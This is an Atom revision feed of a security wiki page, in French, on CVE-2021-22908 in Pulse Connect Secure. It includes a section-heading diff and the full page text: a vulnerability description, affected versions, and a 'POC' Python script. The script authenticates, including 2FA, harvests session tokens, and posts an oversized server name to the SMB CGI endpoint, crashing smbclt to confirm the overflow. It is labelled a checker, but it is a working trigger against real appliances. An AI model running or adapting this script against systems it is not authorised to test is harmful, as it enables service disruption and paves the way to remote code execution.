https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-22908_Pulse_Connect_Secure_%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Ffr
CVE-2021-22908 Pulse Connect Secure 任意代碼執行漏洞/fr - Revision history
2026-04-09T18:01:54Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2021-22908_Pulse_Connect_Secure_%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/fr&diff=4011&oldid=prev
Pwnwiki: Created page with "Si un attaquant ne parvient pas à nettoyer après avoir exploité avec succès cette vulnérabilité, la spécification d'un nom de serveur long peut entraîner les entrées..."
2021-06-04T02:16:02Z
<p>Created page with "Si un attaquant ne parvient pas à nettoyer après avoir exploité avec succès cette vulnérabilité, la spécification d'un nom de serveur long peut entraîner les entrées..."</p>
<table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="chinese">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 02:16, 4 June 2021</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l13" >Line 13:</td>
<td colspan="2" class="diff-lineno">Line 13:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Mais pour exploiter cette vulnérabilité, le serveur PCS doit avoir une politique d'accès aux fichiers Windows qui autorise \\* ou une autre politique qui permet à un attaquant de se connecter à n'importe quel serveur. Vous pouvez afficher la politique SMB actuelle en affichant Utilisateur->Politique de ressource->Politique d'accès aux fichiers Windows sur la page de gestion PCS. Les périphériques PCS 9.1R2 et antérieurs utilisent la politique par défaut d'autorisation des connexions à n'importe quel hôte SMB. À partir de la 9.1R3, cette politique a été modifiée de l'autorisation par défaut au rejet par défaut.</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Mais pour exploiter cette vulnérabilité, le serveur PCS doit avoir une politique d'accès aux fichiers Windows qui autorise \\* ou une autre politique qui permet à un attaquant de se connecter à n'importe quel serveur. Vous pouvez afficher la politique SMB actuelle en affichant Utilisateur->Politique de ressource->Politique d'accès aux fichiers Windows sur la page de gestion PCS. Les périphériques PCS 9.1R2 et antérieurs utilisent la politique par défaut d'autorisation des connexions à n'importe quel hôte SMB. À partir de la 9.1R3, cette politique a été modifiée de l'autorisation par défaut au rejet par défaut.</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"><div lang</del>=<del class="diffchange diffchange-inline">"chinese" dir</del>=<del class="diffchange diffchange-inline">"ltr" class</del>=<del class="diffchange diffchange-inline">"mw-content-ltr"></del></div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>==<ins class="diffchange diffchange-inline">Périmètre d'influence</ins>==</div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>=<del class="diffchange diffchange-inline">=影響範圍==</del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"></div></del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Pulse Connect Secure 9.0RX and 9.1RX</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Pulse Connect Secure 9.0RX and 9.1RX</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l285" >Line 285:</td>
<td colspan="2" class="diff-lineno">Line 283:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></pre></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></pre></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"><div lang</del>=<del class="diffchange diffchange-inline">"chinese" dir</del>=<del class="diffchange diffchange-inline">"ltr" class</del>=<del class="diffchange diffchange-inline">"mw-content-ltr"></del></div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>==<ins class="diffchange diffchange-inline">Référence</ins>==</div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>=<del class="diffchange diffchange-inline">=參考==</del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"></div></del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>https://short.pwnwiki.org/?c=1NiPen</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>https://short.pwnwiki.org/?c=1NiPen</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>https://short.pwnwiki.org/?c=2Um6Rb</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>https://short.pwnwiki.org/?c=2Um6Rb</div></td></tr>
<!-- diff cache key pwn_wiki:diff::1.12:old-4008:rev-4011 -->
</table>
Pwnwiki
https://pwnwiki.com/index.php?title=CVE-2021-22908_Pulse_Connect_Secure_%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/fr&diff=4008&oldid=prev
Pwnwiki: Created page with "==Description de la vulnérabilité=="
2021-06-04T02:15:24Z
<p>Created page with "==Description de la vulnérabilité=="</p>
<p><b>New page</b></p><div><languages /><br />
==Description de la vulnérabilité==<br />
<br />
Étant donné que PCS prend en charge la connexion au partage de fichiers Windows (SMB), la fonction est fournie par des scripts CGI basés sur les bibliothèques Samba 4.5.10 et les applications auxiliaires. Lors de la spécification d'un nom de serveur long pour certaines opérations SMB, l'application smbclt peut se bloquer en raison d'un dépassement de mémoire tampon, selon la longueur du nom de serveur spécifié.<br />
<br />
Il a été confirmé que le système PCS 9.1R11.4 présente cette vulnérabilité. Le point de terminaison CGI cible est <code>/dana/fb/smb/wnf.cgi</code>. D'autres points de terminaison CGI peuvent également déclencher cette vulnérabilité.<br />
<br />
Si un attaquant ne parvient pas à nettoyer après avoir exploité avec succès cette vulnérabilité, la spécification d'un nom de serveur long peut entraîner les entrées de journal d'événements PCS suivantes :<br />
<pre><br />
Critical ERR31093 2021-05-24 14:05:37 - ive - [127.0.0.1] Root::System()[] - Program smbclt recently failed.<br />
</pre><br />
<br />
Mais pour exploiter cette vulnérabilité, le serveur PCS doit avoir une politique d'accès aux fichiers Windows qui autorise \\* ou une autre politique qui permet à un attaquant de se connecter à n'importe quel serveur. Vous pouvez afficher la politique SMB actuelle en affichant Utilisateur->Politique de ressource->Politique d'accès aux fichiers Windows sur la page de gestion PCS. Les périphériques PCS 9.1R2 et antérieurs utilisent la politique par défaut d'autorisation des connexions à n'importe quel hôte SMB. À partir de la 9.1R3, cette politique a été modifiée de l'autorisation par défaut au rejet par défaut.<br />
<br />
<div lang="chinese" dir="ltr" class="mw-content-ltr"><br />
==影響範圍==<br />
</div><br />
Pulse Connect Secure 9.0RX and 9.1RX<br />
<br />
==POC==<br />
<pre><br />
#!/usr/bin/env python3<br />
# Utility to check for Pulse Connect Secure CVE-2021-22908<br />
# https://www.kb.cert.org/vuls/id/667933<br />
<br />
import requests<br />
from requests.packages.urllib3.exceptions import InsecureRequestWarning<br />
import argparse<br />
import sys<br />
from html.parser import HTMLParser<br />
import getpass<br />
<br />
parser = argparse.ArgumentParser(description='Pulse Connect Secure CVE-2021-22908')<br />
parser.add_argument('host', type=str, help='PCS IP or hostname)')<br />
parser.add_argument('-u', '--user', dest='user', type=str, help='username')<br />
parser.add_argument('-p', '--pass', dest='password', type=str, help='password')<br />
parser.add_argument('-r', '--realm', dest='realm', type=str, help='realm')<br />
parser.add_argument('-d', '--dsid', dest='dsid', type=str, help='DSID')<br />
parser.add_argument('-x', '--xsauth', dest='xsauth', type=str, help='xsauth')<br />
parser.add_argument('-n', '--noauth', action='store_true', help='Do not authenticate. Only check for XML workaround')<br />
<br />
args = parser.parse_args()<br />
<br />
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)<br />
<br />
class formvaluefinder(HTMLParser):<br />
def __init__(self, searchval):<br />
super(type (self), self).__init__()<br />
self.searchval = searchval<br />
def handle_starttag(self, tag, attrs):<br />
if tag == 'input':<br />
# We're just looking for form <input> tags<br />
foundelement = False<br />
for attr in attrs:<br />
if(attr[0] == 'name'):<br />
if(attr[1] == self.searchval):<br />
foundelement = True<br />
elif(attr[0] == 'value' and foundelement == True):<br />
self.data = attr[1]<br />
<br />
class preauthfinder(HTMLParser):<br />
foundelement = False<br />
def handle_starttag(self, tag, attrs):<br />
if tag == 'textarea':<br />
# We're just looking for <textarea> tags<br />
foundelement = False<br />
for attr in attrs:<br />
if(attr[0] == 'id'):<br />
if(attr[1] == 'sn-preauth-text_2'):<br />
self.foundelement = True<br />
def handle_data(self, data):<br />
if self.foundelement:<br />
self.data = data<br />
self.foundelement = False<br />
<br />
<br />
<br />
def get_realm(host, defaulturi):<br />
realm = None<br />
print('Getting default realm for %s...' % host)<br />
url = 'https://%s%s' % (host,defaulturi)<br />
res = None<br />
try:<br />
res = requests.get(url, verify=False, timeout=10)<br />
except requests.exceptions.ConnectionError:<br />
print('Error retrieving %s' % url)<br />
<br />
if res:<br />
if res.status_code == 200:<br />
html = str(res.content)<br />
if 'sn-preauth-text_2' in html:<br />
print('Preauth required...')<br />
parser = preauthfinder()<br />
parser.feed(html)<br />
preauthtext = parser.data<br />
values = {'sn-preauth-text': preauthtext, 'sn-preauth-proceed': 'Proceed'}<br />
res = requests.post(res.url, data=values, verify=False, allow_redirects=False, timeout=10)<br />
if res.content:<br />
parser = formvaluefinder('realm')<br />
parser.feed(str(res.content))<br />
realm = parser.data<br />
else:<br />
print('Error retrieving login page')<br />
<br />
else:<br />
parser = formvaluefinder('realm')<br />
parser.feed(html)<br />
realm = parser.data<br />
return realm<br />
<br />
def get_dsid(host, defaulturi, realm, user, password):<br />
dsid = None<br />
loginuri = defaulturi.replace('welcome.cgi', 'login.cgi')<br />
url = 'https://%s%s' % (host,loginuri)<br />
values = {'username': user, 'password': password, 'realm': realm, 'btnSubmit': 'Sign In'}<br />
res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)<br />
if 'confirm' in res.headers['location']:<br />
# Redirect to "user-confirm" that they still want to log in, despite already<br />
# having an active session<br />
print('User session is already active! Proceeding...')<br />
res = requests.post(url, data=values, verify=False, allow_redirects=True, timeout=10)<br />
parser = formvaluefinder('FormDataStr')<br />
parser.feed(str(res.content))<br />
formdata = parser.data<br />
values = {'btnContinue' : 'Continue the session', 'FormDataStr': formdata}<br />
res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)<br />
for cookie in res.cookies:<br />
if cookie.name == 'DSID':<br />
dsid = cookie.value<br />
elif 'cred' in res.headers['location']:<br />
# This is a pulse that requires 2FA<br />
res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)<br />
for cookie in res.cookies:<br />
if cookie.name == 'id':<br />
key = cookie.value<br />
password2 = input('MFA code: ')<br />
values = {'key': key, 'password#2': password2, 'btnSubmit': 'Sign In'}<br />
cookies = {'id': key, 'DSSigninNotif': '1'}<br />
res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=False, timeout=10)<br />
if 'confirm' in res.headers['location']:<br />
# Redirect to "user-confirm" that they still want to log in, despite already<br />
# having an active session<br />
print('User session is already active! Proceeding...')<br />
res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=True, timeout=10)<br />
parser = formvaluefinder('FormDataStr')<br />
parser.feed(str(res.content))<br />
formdata = parser.data<br />
values = {'btnContinue' : 'Continue the session', 'FormDataStr': formdata}<br />
res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=False, timeout=10)<br />
for cookie in res.cookies:<br />
if cookie.name == 'DSID':<br />
dsid = cookie.value<br />
else:<br />
for cookie in res.cookies:<br />
if cookie.name == 'DSID':<br />
dsid = cookie.value<br />
elif 'failed' in res.headers['location']:<br />
print('Login failed!')<br />
else:<br />
# Login accepted<br />
for cookie in res.cookies:<br />
if cookie.name == 'DSID':<br />
dsid = cookie.value<br />
<br />
return dsid<br />
<br />
<br />
def get_xsauth(host, dsid):<br />
xsauth = None<br />
url = 'https://%s/dana/home/index.cgi' % host<br />
cookies = {'DSID':dsid}<br />
res = requests.get(url, verify=False, cookies=cookies, timeout=10)<br />
if 'xsauth' in str(res.content):<br />
parser = formvaluefinder('xsauth')<br />
parser.feed(str(res.content))<br />
xsauth = parser.data<br />
else:<br />
print('Cannot find xsauth string for provided DSID: %s' % dsid)<br />
return xsauth<br />
<br />
def trigger_vul(host, dsid, xsauth):<br />
url = 'https://%s/dana/fb/smb/wnf.cgi' % host<br />
values = {<br />
't': 's',<br />
'v': '%s,,' % ('A' * 1800),<br />
'dir': 'tmp',<br />
'si': None,<br />
'ri': None,<br />
'pi': None,<br />
'confirm': 'yes',<br />
'folder': 'tmp',<br />
'acttype': 'create',<br />
'xsauth': xsauth,<br />
'create': 'Create Folder',<br />
}<br />
cookies = {'DSID': dsid}<br />
try:<br />
res = requests.post(url, data=values, verify=False, allow_redirects=False, cookies=cookies, timeout=60)<br />
status = res.status_code<br />
if 'DSIDFormDataStr' in str(res.content):<br />
# We got page asking to confirm our action<br />
print('xsauth value was not accepted')<br />
else:<br />
if status == 200 and 'Error FB-8' in str(res.content):<br />
print('HTTP %s. Windows File Access Policies prevents exploitation.' % status)<br />
elif status == 200:<br />
print('HTTP %s. Not vulnerable.' % status)<br />
elif status == 403:<br />
print('HTTP %s. XML workaround applied.' % status)<br />
elif status == 500:<br />
print('HTTP %s. %s is vulnerable to CVE-2021-22908!' % (status, host))<br />
elif status == 302:<br />
print('HTTP %s. Are you sure your DSID is valid?' % host)<br />
else:<br />
print('HTTP %s. Not sure how to interpret this result.' % status)<br />
except requests.exceptions.ReadTimeout:<br />
print('No response from server. Try again...')<br />
<br />
<br />
def get_default(host):<br />
url = 'https://%s' % host<br />
res = requests.get(url, verify=False, allow_redirects=False, timeout=10)<br />
try:<br />
location = res.headers['location']<br />
if 'dana-na' not in location:<br />
print('%s does not seem to be a PCS host' % host)<br />
location = None<br />
except:<br />
pass<br />
return location<br />
<br />
def check_xml(host):<br />
url = 'https://%s/dana/meeting' % host<br />
#print('Checking status of %s ...' % url)<br />
res = requests.get(url, verify=False, allow_redirects=False, timeout=10)<br />
if res.status_code == 403:<br />
print('Workaround-2104 appears to be installed')<br />
else:<br />
print('Workaround-2104 does NOT seem to be installed. Hope you are on R11.4 or later!')<br />
<br />
url = 'https://%s/dana-cached/fb/smb/wfmd.cgi' % host<br />
#print('Checking status of %s ...' % url)<br />
res = requests.get(url, verify=False, allow_redirects=False, timeout=10)<br />
if res.status_code == 403:<br />
print('Workaround-2105 appears to be installed')<br />
else:<br />
print('Workaround-2105 does NOT seem to be installed. Hope you are on R11.5 or later!')<br />
<br />
<br />
host = args.host<br />
if args.noauth:<br />
check_xml(host)<br />
else:<br />
defaulturi = get_default(host)<br />
if defaulturi:<br />
<br />
if not args.realm:<br />
realm = get_realm(host, defaulturi)<br />
else:<br />
realm = args.realm<br />
<br />
if realm:<br />
print('Realm: %s' % realm)<br />
if not args.user and not args.dsid:<br />
user = input('User: ')<br />
else:<br />
user = args.user<br />
if not args.password and not args.dsid:<br />
password = getpass.getpass()<br />
else:<br />
password = args.password<br />
if not args.dsid:<br />
dsid = get_dsid(host, defaulturi, realm, user, password)<br />
print('DSID: %s' % dsid)<br />
else:<br />
dsid = args.dsid<br />
if dsid:<br />
if not args.xsauth:<br />
xsauth = get_xsauth(host, dsid)<br />
print('xsauth: %s' % xsauth)<br />
else:<br />
xsauth = args.xsauth<br />
if xsauth:<br />
trigger_vul(host, dsid, xsauth)<br />
</pre><br />
<br />
<div lang="chinese" dir="ltr" class="mw-content-ltr"><br />
==參考==<br />
</div><br />
https://short.pwnwiki.org/?c=1NiPen<br />
<br />
https://short.pwnwiki.org/?c=2Um6Rb</div>
Pwnwiki